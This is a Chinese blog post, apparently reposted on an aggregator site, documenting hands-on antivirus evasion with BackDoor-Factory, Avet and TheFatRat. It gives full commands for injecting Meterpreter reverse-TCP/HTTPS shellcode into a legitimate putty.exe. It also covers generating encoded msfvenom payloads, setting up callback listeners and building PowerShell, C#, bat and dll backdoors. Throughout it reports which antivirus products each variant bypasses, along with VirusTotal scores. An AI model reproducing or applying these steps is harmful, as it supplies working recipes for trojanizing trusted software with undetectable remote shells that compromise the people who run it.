參考資料

利用BDF向EXE文件植入后門(mén):https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8BDF%E5%90%91EXE%E6%96%87%E4%BB%B6%E6%A4%8D%E5%85%A5%E5%90%8E%E9%97%A8/

backdoor-factory使用簡(jiǎn)介：https://www.lstazl.com/backdoor-factory%E4%BD%BF%E7%94%A8%E7%AE%80%E4%BB%8B/

backdoor-factory使用：https://www.cnblogs.com/-qing-/p/11421709.html

Msf木馬過(guò)狗免殺之利用Avet過(guò)20+狗：https://zhuanlan.zhihu.com/p/38813500

AntiVirus Evasion Tool(avet)測(cè)試分析:https://3gstudent.github.io/3gstudent.github.io/AntiVirus-Evasion-Tool(avet)%E6%B5%8B%E8%AF%95%E5%88%86%E6%9E%90/

TheFatRat 一款簡(jiǎn)易后門(mén)工具：https://www.zhuanzhi.ai/document/22f6e03336336de7f211ac7b97c2fb0f

TheFatRat – 跨平臺(tái)反彈后門(mén)Shell生成神器：http://caidaome.com/?post=198

BackDoor-Factory

介紹

BackDoor-factory，又稱(chēng)后門(mén)工廠(BDF)，BDF是也是一款老牌的免殺神器，其作者曾經(jīng)在2015年的blackhat大會(huì)上介紹過(guò)該工具。但是作者已經(jīng)于2017年停止更新，免殺效果就算現(xiàn)在來(lái)看也還算不錯(cuò)的。

原理：可執(zhí)行二進(jìn)制文件中有大量的00,這些00是不包含數(shù)據(jù)的,將這些數(shù)據(jù)替換成payload,并且在程序執(zhí)行的時(shí)候,jmp到代碼段,來(lái)觸發(fā)payload

安裝

官方地址：

https://github.com/secretsquirrel/the-backdoor-factory

?方法一、

apt update apt install backdoor-factory

kali集成的是最新版本

后來(lái)實(shí)際使用時(shí)候發(fā)現(xiàn)，之前好用的putty竟然被識(shí)別不是PE文件，WTF!!!!!

所以改用了github上的

git clone https://github.com/secretsquirrel/the-backdoor-factory

問(wèn)題解決

方法二、docker

systemctl daemon-reload systemctl restart docker docker pull secretsquirrel/the-backdoor-factory docker run -it secretsquirrel/the-backdoor-factory bash # ./backdoor.py

docker里的版本為3.4.0,不算是最新版本，不過(guò)影響不大。

但是docker拖文件有點(diǎn)小麻煩，所以我最后使用了github方式進(jìn)行試驗(yàn)以及操作

直接生成免殺后門(mén)(VT免殺率37/71)

在"捆綁"之前，BDF需要檢查一下宿主exe能否被支持"插入"shellcode。

檢查

python backdoor.py -f /root/test/putty.exe -S

說(shuō)明可以被支持

搜索該文件可用的Code Caves(代碼縫隙)

./backdoor.py -f /root/test/putty.exe -c -l 600 #-c：code cave(代碼裂縫 #-l：代碼裂縫大小

發(fā)現(xiàn)有三個(gè)代碼縫隙，一般shellcode大小300個(gè)字節(jié)，所以選擇一個(gè)適當(dāng)?shù)目p隙就行

獲取該文件的可用payload

./backdoor.py -f /root/test/putty.exe -s -show

cave_miner_inline:作為payload模板，長(zhǎng)度為135，僅實(shí)現(xiàn)了控制流程跳轉(zhuǎn)，不做其他操作，可用作自定義開(kāi)發(fā)shellcode的模板

reverse_shell_tcp_inline：對(duì)應(yīng)的msf：use exploit/multi/handlerset payload windows/meterpreter/reverse_tcp

meterpreter_reverse_https_threaded：對(duì)應(yīng)的msf：use exploit/multi/handlerset payload windows/meterpreter/reverse_https

iat_reverse_tcp_inline中的iat：iat為Import Address Table(導(dǎo)入地址表)的縮寫(xiě)，如果PE文件的IAT不包含API LoadLibraryA和GetProcAddress，直接執(zhí)行payload?reverse_shell_tcp_inline會(huì)失敗，iat_reverse_tcp_inline增加了修復(fù)IAT的功能，避免執(zhí)行失敗

iat_reverse_tcp_stager_threaded:增加了修復(fù)IAT的功能

user_supplied_shellcode_threaded：對(duì)應(yīng)的msf：use exploit/multi/handlerset payload windows/meterpreter/reverse_tcp``自定義shellcode

生成payload

./backdoor.py -f /root/test/putty.exe -H 192.168.42.138 -P 3333 -s reverse_shell_tcp_inline --可以正常上線 #./backdoor.py -f /root/test/putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.42.138 -P 3333 -J -o bdf_backdoor.exe --大佬的poc，我用復(fù)現(xiàn)沒(méi)有成功 #-c：code cave(代碼裂縫) #-l：代碼裂縫大小 #-s：選擇使用 payload 類(lèi)型 #-H：選擇回連服務(wù)器地址 #-P：回連服務(wù)器端口 #-J：使用多代碼裂縫注入

選擇裂縫的地方進(jìn)行插入，然后輸出到了 backdoored文件夾下

?

msf上監(jiān)聽(tīng)

handler -H 192.168.42.138 -P 3333 -p windows/meterpreter/reverse_tcp

?過(guò)了360.但沒(méi)有過(guò)火絨

?

上vt：

效果一般，不過(guò)過(guò)了騰訊和360，算是小驚喜，可以當(dāng)炮灰馬去玩玩，而且這個(gè)shellcode插入的位置和免殺效果關(guān)系很大，大佬的poc我沒(méi)有復(fù)現(xiàn)成功，到時(shí)候可以再加一些其他的參數(shù)，可能效果會(huì)更好一點(diǎn)

使用自己定義的shellcode(VT免殺率30/69)

先用msfvenom生成raw格式的shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.42.138 LPORT=3333 -e x86/shikata_ga_nai -i 5 -f raw -o shellcode.c

使用backdoor的user_supplied_shellcode_threaded模塊加載自定義的shellcode

./backdoor.py -f /root/test/putty.exe -s user_supplied_shellcode_threaded -U /root/test/shellcode.c -o bdf_c.exe

可以正常上線，仍然是可以過(guò)360，但是不能過(guò)火絨

上vt：

還是可以過(guò)360和騰訊，其他的不行，這種注入類(lèi)型的工具跟注入的位置有密切的關(guān)系

小結(jié)

利用backdoor-factory使用，用戶可以在不破壞原有可執(zhí)行文件的功能的前提下，在文件的代碼裂隙中插入惡意代碼Shellcode。當(dāng)可執(zhí)行文件被執(zhí)行后，就可以觸發(fā)惡意代碼。Backdoor Factory不僅提供常用的腳本，還允許嵌入其他工具生成的Shellcode，如Metasploit。

該工具還有很強(qiáng)大的一些其他功能，比如加私鑰證書(shū)、CPT等等，雖然目前軟件已經(jīng)不再更新，但免殺效果至今依然不錯(cuò)也能管中窺豹看到它的強(qiáng)悍之處。

?

?

Avet免殺(VT免殺率30/70)

介紹

Avet全稱(chēng)AntiVirus Evasion Tool，2017年在blackhat大會(huì)上公開(kāi)演示，可對(duì)shellcode，exe和dll等多種載荷進(jìn)行免殺處理，使用了多種不同的免殺技術(shù)，具有較好的免殺效果，據(jù)說(shuō)在blackhat大會(huì)上演示時(shí)免殺效果震撼全場(chǎng)。

安裝

git clone https://github.com/govolution/avet

#如果是64位系統(tǒng)，可以直接使用下面命令來(lái)進(jìn)行安裝
./setup.sh
安裝后執(zhí)行python ./avet_fabric.py即可。
#看起來(lái)沒(méi)什么問(wèn)題，但是有時(shí)候在最后生成exe時(shí)會(huì)報(bào)錯(cuò)。。報(bào)錯(cuò)后還可以選擇手動(dòng)安裝，逐個(gè)排除錯(cuò)誤。

setup.sh會(huì)在/etc/apt/source.list里面添加三個(gè)源，然后apt update巨慢，所以我選擇了手動(dòng)安裝，大家可以先應(yīng)用setup.sh試一下，如果不好使，可以嘗試下面的手動(dòng)安裝

git clone https://github.com/govolution/avet dpkg --add-architecture i386 apt-get update apt-get install wine -y apt-get install wine32 -y wget -c --no-check-certificate https://nchc.dl.sourceforge.net/project/tdm-gcc/TDM-GCC%20Installer/tdm64-gcc-5.1.0-2.exe wine tdm64-gcc-5.1.0-2.exe

別問(wèn)我咋知道的，選擇create

我選的第二個(gè)，看個(gè)人

然后python3 avet_fabric.py即可運(yùn)行，運(yùn)行后顯示了它支持的各個(gè)模塊

我們選擇了7，7: build_50xshikata_revhttps_win32.sh

之后ip和端口要修改一下

然后輸出到了output文件夾下

測(cè)試一下

kali里面監(jiān)聽(tīng)：

handler -H 192.168.42.138 -P 3333 -p windows/meterpreter/reverse_https

可以正常上線

被火絨干掉了，但是360可以繞過(guò)

上vt：

果然這種類(lèi)型的文章一發(fā)出來(lái)，查殺率就直線上升，不過(guò)沒(méi)關(guān)系，攻防間的對(duì)抗總是這么interesting

?

TheFatRat免殺

介紹

TheFatRat創(chuàng)建的后門(mén)或者payload，可以在Linux，Windows，Mac和Android上等多種平臺(tái)上執(zhí)行，可生成exe、apk、sh、bat、py等多種格式。TheFatRat可以和msf無(wú)縫對(duì)接，并且集成內(nèi)置了Fudwin、Avoid、backdoor-factory等多個(gè)免殺工具，對(duì)powershell的免殺姿勢(shì)尤其多樣。

安裝

git clone https://github.com/Screetsec/TheFatRat cd TheFatRat chmod +x setup.sh && ./setup.sh

使用

fatrat

下面是重劍無(wú)鋒大佬給的翻譯

[01] Create Backdoor with msfvenom #01：直接利用msf來(lái)生產(chǎn)后門(mén)，基本不能免殺 [02] Create Fud 100% Backdoor with Fudwin 1.0#02：使用Fudwin 1.0創(chuàng)建powershell后門(mén)，ps1利用powerstager混淆，從結(jié)果來(lái)看效果不錯(cuò) [03] Create Fud Backdoor with Avoid v1.2 # 03: 使用Avoid v1.2創(chuàng)建后門(mén) [04] Create Fud Backdoor with backdoor-factory [embed] #04：使用backdoor-factory創(chuàng)建后門(mén) [05] Backdooring Original apk [Instagram, Line,etc] #05：生成安卓使用的apk后門(mén) [06] Create Fud Backdoor 1000% with PwnWinds [Excelent] #06：綜合了多種方式，可生成bat、exe、dll、ps1等，可利用c、C#多種語(yǔ)言編譯，官方非常推薦，但經(jīng)嘗試免殺效果一般，肯定是被殺軟列入特征庫(kù)了 [07] Create Backdoor For Office with Microsploit #07：生成office類(lèi)后門(mén) [08] Trojan Debian Package For Remote Access [Trodebi]#08：生成linux后門(mén)

其實(shí)在TheFatRat的github頁(yè)面上給了很多利用的視頻以及pdf之類(lèi)的東西，大家如果有興趣可以去看一看

由于01是直接調(diào)用了msfvenom生成payload，只不過(guò)稍微進(jìn)行了多個(gè)msfvenom編碼，免殺效果肯定一般

但是我還是準(zhǔn)備試一下：

結(jié)果不能上線，不知道是我環(huán)境的問(wèn)題還是軟件的問(wèn)題

02-powershell混淆-1(VT免殺率25/71)

先選2

然后選1，利用powerstager混淆，并將powershell編譯成exe。

這里要注意兩點(diǎn)，一是

這里的文件名后綴一定要填

二是python要裝names的包

如果還是生成錯(cuò)誤，建議去查看TheFatRat/logs/fudwin.log看看有什么報(bào)錯(cuò)信息

生成成功后進(jìn)行測(cè)試，會(huì)彈出來(lái)這個(gè)窗口

大佬測(cè)試是可以正常上線的，可能是我的環(huán)境有問(wèn)題，我的139（裸奔）機(jī)器并不會(huì)有任何相應(yīng)，141（火絨）機(jī)器會(huì)上線，但是之后立刻掉線，好像之前也遇到過(guò)這種情況

心情是崩潰的?

360和火絨都會(huì)提示對(duì)powershell進(jìn)行了操作，而我們確實(shí)操作了powershell

?

看看vt吧。。。。

竟然連江民都沒(méi)過(guò)，卻過(guò)了360，不過(guò)360提示操作了powershell。。。

02-powershell混淆-2

這回選2，slow but powerfull。

由于機(jī)器原因，這個(gè)效果如圖：

亂碼亂成這樣，玩?zhèn)€錘子，以后有時(shí)間繼續(xù)深搞，有興趣的大佬可以自己折騰一下，心累了。。。。。。。。。。

就不傳vt了，沒(méi)什么參考意義，但是看重劍無(wú)鋒大佬操作的，效果不算差，到時(shí)候再操作一波

06-使用TheFatRat編譯C#+powershell生成exe(VT免殺率38/71)

應(yīng)用了[06] ?Create Fud Backdoor 1000% with PwnWinds [Excelent]

選擇了2，用c#+powershell來(lái)生成exe

還是和上面一樣的操作

c#代碼生成成功

測(cè)試一下，可以正常上線

但是執(zhí)行的時(shí)候，火絨和360都提示執(zhí)行了powershell命令，但是靜態(tài)的都沒(méi)有被殺，可以正常上線

上vt：

又試了一下bat和dll，其中bat正常上線，dll上線后死掉，bat是28/59，dll是3/70

總結(jié)

TheFatRat創(chuàng)建的后門(mén)格式和支持的平臺(tái)比較多樣化，而且還支持生成CDROM/U盤(pán)中能自動(dòng)運(yùn)行(生成AutoRun文件)的后門(mén)文件，并且可以對(duì)payload更改圖標(biāo)，具有一定偽裝效果。

TheFatRat的很多免殺方式是借助于msfvenom編碼、upx等加殼壓縮、c/c#編譯等將powershell混淆后編譯成exe或bat文件，但有些在執(zhí)行時(shí)還是會(huì)調(diào)用powershell，而powershell的調(diào)用已經(jīng)被各大殺軟盯的很緊了，所以查殺效果只能算是一般了。

ps：就是安裝包有點(diǎn)大，powershell確實(shí)有點(diǎn)難作為免殺的方向了

?

?

?

?

總結(jié)

以上是生活随笔為你收集整理的TideSec远控免杀学习四（BackDoor-Factory+Avet+TheFatRat）的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。